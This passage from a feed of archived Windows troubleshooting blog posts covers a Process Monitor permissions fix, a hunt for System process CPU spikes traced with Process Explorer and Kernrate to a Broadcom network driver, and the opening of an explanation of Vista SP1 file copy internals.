minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> <IMG height="241" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054811/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3054811/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121025iD5F2D9682B4B1D85" style="WIDTH: 368px; HEIGHT: 241px" width="368" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Doing this caused the proper security permissions to be configured for the file. I ran another test and the problem was solved! 
</FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Looking back I believe that this problem occurred because I used Windows Explorer to “Move” and not “Copy” the csv file into place. <SPAN style="mso-spacerun: yes"> </SPAN> I did some more tests to confirm this. <SPAN style="mso-spacerun: yes"> </SPAN> When you “Move” a file within the same volume using Windows Explorer, the file permissions are moved with it. <SPAN style="mso-spacerun: yes"> </SPAN> When you “Copy” a file using Windows Explorer, it creates a new file that inherits permissions from the target folder. <SPAN style="mso-spacerun: yes"> </SPAN> If I had originally performed a “Copy” this problem would have never happened. </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> Now my first reaction to unexplained problems will be to run Process Monitor and see what’s going on under the hood! 
</FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> <FONT size="3"> -Troy Wolbrink </FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="FONT-FAMILY: 'Calibri','sans-serif'; mso-ascii-theme-font: minor-latin; mso-hansi-theme-font: minor-latin"> </SPAN></P><P> <FONT size="3"> </FONT> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:39:33 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/guest-post-the-case-of-the-frontpage-error/ba-p/723637 MarkRussinovich 2019-06-27T06:39:33Z The Case of the System Process CPU Spikes https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-system-process-cpu-spikes/ba-p/723630 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Apr 07, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As you’ve probably surmised by my blog posts and other writings, I like knowing exactly what my systems are doing. I want to know if a process is running away with the CPU, causing memory pressure, or hitting the disk. Besides keeping my computers running smoothly, my vigilance sometimes helps me spot performance and reliability problems in Windows and third-party code. 
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The main way I keep tabs on things is to configure <A class="" href="#" mce_href="#" target="_blank"> Process Explorer </A> </FONT> <FONT face="Calibri" size="3"> to run automatically when I log in. Whenever I configure a new computer, I add a shortcut to Process Explorer to my profile’s Startup directory that includes the /t (minimize) switch. Process Explorer then runs otherwise hidden, with a tray icon that shows a small historical view of CPU activity level. Because I want access to detailed information about system processes, as well as my own, I also specify the /e option on Vista, which causes Windows to present a UAC prompt on logon that allows me to grant Process Explorer administrative rights. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Because I keep an eye out for CPU spikes in Process Explorer’s tray icon, which show up as green or red for user-mode (application) and kernel-mode (operating system and drivers) CPU usage, respectively, I’ve identified several application bugs over the last few months. In this post, I’ll share how I used both Process Explorer and another tool, Kernrate, to identify a problem with a third-party driver and followed the problem through to a fix by the vendor. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not long after I got a new laptop several months ago, I noticed that the system sometimes felt sluggish. Process Explorer’s tray icon corroborated my perception by displaying a mini-graph of red CPU activity. 
The icon opens a tooltip that reports the name of the process consuming the most CPU when you move the mouse over it, and in this case the tooltip showed the System process as being responsible: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="68" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3030297/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3030297/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121015i6258BAB477430F2C" style="WIDTH: 125px; HEIGHT: 68px" width="125" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <SPAN style="mso-spacerun: yes"> </SPAN> The first few times I noticed the problem, it resolved itself shortly after and I didn’t have a chance to troubleshoot. However, I could see by opening Process Explorer’s System Information dialog that the CPU spikes were significant: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="124" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029794/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029794/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121016iAAB314F6306A729E" style="WIDTH: 550px; HEIGHT: 124px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The System process is special because it doesn’t host an executable image like other processes. 
It exists solely to host operating system threads for the memory manager, cache manager, and other subsystems, as well as device driver threads. <SPAN style="mso-spacerun: yes"> </SPAN> These threads execute entirely in kernel mode, which is why System process CPU usage shows up as red in Process Explorer’s graphs. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I suspected that a third-party device driver was the cause of the problem, so the first step in my investigation was to figure out which thread was using CPU, which would hopefully point me at the guilty party. I watched vigilantly for signs of trouble every time I switched networks and jumped the first time I saw one. Process Explorer shows the threads running in a process on the Threads page of the Process Properties dialog, so I double-clicked on the System process and switched to the Threads page the next time I noticed the CPU spike: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029795/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029795/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121017iF288300BDE800D4D" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The “ntkrnlpa.exe” prefix on each thread’s start address identified the ones I saw at the top of the CPU usage sort order as operating system threads (Ntkrnlpa.exe is the version of the kernel loaded on 32-bit client systems that have no execute memory protection or server systems that need to address more than 4GB of memory). 
Because I had previously configured Process Explorer to retrieve symbols for operating system images from the Microsoft public symbol server, the thread list also showed the names of the thread start functions. The most active threads began in the ExpWorkerThread function, which means that they were worker threads that perform work on behalf of the system and device drivers. Instead of creating dedicated threads that consume memory resources, the system and drivers can throw work at the shared pool of operating system <A class="" href="#" mce_href="#" target="_blank"> worker threads </A> </FONT> <FONT face="Calibri" size="3"> . </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Unfortunately, knowing that worker threads were causing the CPU usage didn’t get me any closer to identifying a root cause. I really needed to know what functions the worker threads were calling, because the functions would be inside the device driver or operating system component on whose behalf the threads were running. One way to look inside a thread’s execution is to look at the thread’s stack with Process Explorer. The stack is a memory region that stores function invocations, and Process Explorer will show you a thread’s stack when you select the thread and press the Stack button or double-click on the thread. 
On Vista, however, you get this error when you try and look at the stack for threads in the System process: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="165" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029796/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029796/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121018iB47EA75F884E38EF" style="WIDTH: 229px; HEIGHT: 165px" width="229" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The System process is a special type of process on Vista called a “protected process” that doesn’t allow any access to its threads or memory. Protected processes were introduced to support Digital Rights Management (DRM) so that hi-definition content providers can store content encryption keys with a reduced risk of an administrative user using DRM-stripping tools to reach into the process and read the keys. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> That approach foiled, I had to find another way to see what the worker threads were doing. For that, I turned to <A class="" href="#" mce_href="#" target="_blank"> KernRate </A> </FONT> <FONT face="Calibri" size="3"> , a command-line profiling tool that’s a free download from Microsoft. KernRate can profile user-mode processes and kernel-mode threads. It uses the sample-based profiling facility that was introduced in the first release of Windows NT, which records the unique addresses at which the CPU is executing when the profiling interval timer fires. 
When you stop a profile capture, Kernrate retrieves the information from the kernel, maps the addresses to the loaded device drivers into which they fall, and can even use the symbol engine to report the names of functions. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I wouldn’t need symbols if the trace identified a device driver, so I ran Kernrate without passing it any arguments. Despite the fact that there’s no officially supported version of Kernrate for Vista, the version for Windows XP, Kernrate_i386_XP.exe, works on Vista 32-bit (you can also use the recently released <A class="" href="#" mce_href="#" target="_blank"> xperf </A> </FONT> <FONT face="Calibri" size="3"> tool to perform similar profiling - xperf requires Vista or Server 2008, but works on 64-bit versions). I let the profile run through heavy bursts of CPU usage and then hit Ctrl+C to print the results to the console window: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="150" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029797/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029797/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121019iF170B5A8B078248D" style="WIDTH: 550px; HEIGHT: 150px" width="550" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In first place were hits in the kernel, but in second was a driver that I didn’t recognize, b57nd60x. 
Most driver files are located in the %systemroot%\system32\drivers directory, so I could have opened that folder and viewed the file’s properties in Explorer, but I had Process Explorer open so a quicker way to check the driver’s vendor and version was to open the DLL view for the System process. The DLL view shows the DLLs and files mapped into the address space of user-mode processes, but for the System process it shows the kernel modules, including drivers, loaded on the system. The DLL view revealed that the driver was for my laptop’s NIC, was from Broadcom, and was version 10.10: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="320" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029798/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/3029798/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121020iC5675BDE40520B6B" style="WIDTH: 550px; HEIGHT: 320px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Now that I knew that the Broadcom driver was causing the CPU usage, the next step was to see if there was a newer version available. I went to Dell’s download page for my system, but didn’t find anything. Suspecting that what I noticed might not be a known issue, I decided to notify Broadcom. I used contacts on the hardware ecosystem team here at Microsoft to find the Broadcom driver representative and email him a detailed description of the symptoms and my investigation. 
He forwarded my email to the driver developer, who acknowledged that they didn’t know the cause and within a few days sent me a debug version of the driver with symbols so that I could capture a Kernrate profile that would tell them what functions in the driver were active during the spikes. The problem reoccurred a few days later and I sent back the Kernrate output with function information. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The developer explained that my trace revealed that the driver didn’t efficiently interact with the PCIe bus when processing specific queries and the problem seemed to be exacerbated by my particular hardware configuration. He gave me a new driver to try and, after a few weeks of monitoring my laptop closely for issues, I confirmed that the problem appeared to be resolved. The updated driver has not yet been posted to Dell’s support site, but I expect it to show up there in the near future. Another case closed, this time with Process Explorer, Kernrate, and a helpful Broadcom driver developer. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you like these troubleshooting blog posts, you’ll enjoy the webcast of my <A class="" href="#" mce_href="#" target="_blank"> “Case of the Unexplained…” </A> </FONT> <FONT face="Calibri" size="3"> session from TechEd/ITforum. Its 75 minutes are packed with real-world troubleshooting examples, including the one written up in this post and others, as well as some that I haven’t documented. At the end of the session I ask the audience to send me screenshots, log files and descriptions of their own troubleshooting success stories, in return for which I’ll send back a signed copy of <A class="" href="#" mce_href="#" target="_blank"> Windows Internals </A> </FONT> <FONT face="Calibri" size="3"> . The offer stands, so remember to document your investigation and you can get a free book. 
I’ve gotten a number of great examples and my next blog post will be a guest post by someone that watched the webcast and used Process Monitor to solve a problem with their web server. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Finally, if you want to see me speak live, come to <A class="" href="#" mce_href="#" target="_blank"> TechEd US/IT Pro </A> </FONT> <FONT face="Calibri" size="3"> in June in Orlando where I’ll be delivering “The Case of the Unexplained…”, “Windows Server 2008 Kernel Advances”, and “Windows Security Boundaries”. Hope to see you there! </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:38:56 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-system-process-cpu-spikes/ba-p/723630 MarkRussinovich 2019-06-27T06:38:56Z Inside Vista SP1 File Copy Improvements https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/inside-vista-sp1-file-copy-improvements/ba-p/723622 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 04, 2008 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT face="Calibri" size="3"> Windows Vista SP1 includes a number of enhancements over the original Vista release in the areas of application compatibility, device support, power management, security and reliability. You can see a detailed list of the changes in the Notable Changes in Windows Vista Service Pack 1 whitepaper that you can download <A class="" href="#" mce_href="#" target="_blank"> here </A> </FONT> </SPAN> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> . 
</FONT> </FONT> </SPAN> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> One of the improvements highlighted in the document is the increased performance of file copying for multiple scenarios, including local copies on the same disk, copying files from remote non-Windows Vista systems, and copying files between SP1 systems. How were these gains achieved? The answer is a complex one and lies in the changes to the file copy engine between Windows XP and Vista and further changes in SP1. Everyone copies files, so I thought it would be worth taking a break from the “Case of…” posts and diving deep into the evolution of the copy engine to show how SP1 improves its performance. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Copying a file seems like a relatively straightforward operation: open the source file, create the destination, and then read from the source and write to the destination. In reality, however, the performance of copying files is measured along the dimensions of accurate progress indication, CPU usage, memory usage, and throughput. In general, optimizing one area causes degradation in others. Further, there is semantic information not available to copy engines that could help them make better tradeoffs. For example, if they knew that you weren’t planning on accessing the target of the copy operation, they could avoid caching the file’s data in memory, but if they knew that the file was going to be immediately consumed by another application or, in the case of a file server, by client systems sharing the files, they would aggressively cache the data on the destination system. 
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> File Copy in Previous Versions of Windows </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> In light of all the tradeoffs and imperfect information available to it, the Windows file copy engine tries to handle all scenarios well. Prior to Windows Vista, it took the straightforward approach of opening both the source and destination files in cached mode and marching sequentially through the source file reading 64KB (60KB for network copies because of an SMB1.0 protocol limit on individual read sizes) at a time and writing out the data to the destination as it went. When a file is accessed with cached I/O, as opposed to memory-mapped I/O or I/O with the no-buffering flag, the data read or written is stored in memory, at least until the Memory Manager decides that the memory should be repurposed for other uses, including caching the data of other files. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The copy engine relied on the Windows Cache Manager to perform asynchronous read-ahead, which essentially reads the source file in the background while Explorer is busy writing data to a different disk or a remote system. 
It also relied on the Cache Manager’s write-behind mechanism to flush the copied file’s contents from memory back to disk in a timely manner so that the memory could be quickly repurposed if necessary, and so that data loss is minimized in the face of a disk or system failure. You can see the algorithm at work in this <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> trace of a 256KB file being copied on Windows XP from one directory to another with filters applied to focus on the data reads and writes: </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT face="Calibri" size="3"> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815675/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815675/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121007i0490C987BDAE7AD9" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN>
<SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Explorer’s first read operation, at event 0, targets data that’s not present in memory, so the Cache Manager performs a non-cached I/O (an I/O that reads or writes data directly to the disk without caching it in memory) to fetch the data from disk at event 1, as seen in the stack trace for event 1: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="342" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815676/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815676/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121008i4D71E41F074511E6" style="WIDTH: 327px; HEIGHT: 342px" width="327" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> In the stack trace, Explorer’s call to ReadFile is at frame 22 in its BaseCopyStream function and the Cache Manager invokes the non-cached read indirectly by touching the memory 
mapping of the file and causing a page fault at frame 8. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Because Explorer opens the file with the sequential-access hint (not visible in trace), the Cache Manager’s read-ahead thread, running in the System process, starts to aggressively read the file on behalf of Explorer at events 2 and 3. You can see the read-ahead functions in the stack for event 2: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> <IMG height="276" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815677/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815677/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121009iF65B5030B9F21B87" style="WIDTH: 315px; HEIGHT: 276px" width="315" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> You may have noticed that the read-ahead reads are initially out of order with respect to the original non-cached read caused by the first Explorer read, which can cause disk head seeks and slow performance, but Explorer stops causing non-cached I/Os when it 
catches up with the data already read by the Cache Manager and its reads are satisfied from memory. <SPAN style="mso-spacerun: yes"> </SPAN> The Cache Manager generally stays 128KB ahead of Explorer during file copies. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> At event 4 in the trace, Explorer issues the first write and then you see a sequence of interleaved reads and writes. At the end of the trace the Cache Manager’s write-behind thread, also running in the System process, flushes the target file’s data from memory to disk with non-cached writes. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Vista Improvements to File Copy </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> During Windows Vista development, the product team revisited the copy engine to improve it for several key scenarios. One of the biggest problems with the engine’s implementation is that for copies involving lots of data, the Cache Manager write-behind thread on the target system often can’t keep up with the rate at which data is written and cached in memory. That causes the data to fill up memory, possibly forcing other useful code and data out, and eventually, the target system’s memory to become a tunnel through which all the copied data flows at a rate limited by the disk. 
<SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Another problem they noted was that when copying from a remote system, the file’s contents are cached twice on the local system: once as the source file is read and a second time as the target file is written. Besides causing memory pressure on the client system for files that likely won’t be accessed again, involving the Cache Manager introduces CPU overhead, because it must manage its file mappings of the source and destination files. </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> A limitation of the relatively small and interleaved file operations is that the SMB file system driver, the driver that implements the Windows remote file sharing protocol, doesn’t have opportunities to pipeline data across high-bandwidth, high-latency networks like WLANs. Every time the local system waits for the remote system to receive data, the data flowing across the network drains and the copy pays the latency cost as the two systems wait for each other’s acknowledgement and next block of data. 
